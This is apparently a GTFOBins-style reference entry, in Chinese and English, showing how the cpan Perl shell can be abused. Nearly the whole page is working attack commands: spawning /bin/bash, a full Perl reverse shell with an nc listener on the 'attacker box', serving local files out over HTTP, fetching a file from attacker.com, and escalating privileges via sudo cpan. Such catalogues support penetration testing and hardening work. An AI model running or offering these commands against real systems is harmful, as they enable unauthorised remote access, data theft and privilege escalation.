.. / cpan

shell

用来生成一个交互式的系统shell。

• cpan lets you execute perl commands with the ! command.

  cpan
  ! exec '/bin/bash'
  

reverse-shell

向监听的端口发送反向shell，以打开远程网络访问。

• Run nc -lvp RPORT on the attacker box to receive the shell.

  export RHOST=localhost
  export RPORT=9000
  cpan
  ! use Socket; my $i="$ENV{RHOST}"; my $p=$ENV{RPORT}; socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp")); if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S"); open(STDOUT,">&S"); open(STDERR,">&S"); exec("/bin/sh -i");};
  

file-upload

上传文件到外部。

• Serve files in the local folder running an HTTP server on port 8080. Install the dependency via cpan HTTP::Server::Simple.

  cpan
  ! use HTTP::Server::Simple; my $server= HTTP::Server::Simple->new(); $server->run();
  

file-download

下载远程文件。

• Fetch a remote file via an HTTP GET request and store it in PWD.

  export URL=http://attacker.com/file_to_get
  cpan
  ! use File::Fetch; my $file = (File::Fetch->new(uri => "$ENV{URL}"))->fetch();
  

sudo

如果二进制文件被 sudo 允许以超级用户身份运行，可能被用于访问文件系统、提升或维持特权访问。

• sudo cpan
  ! exec '/bin/bash'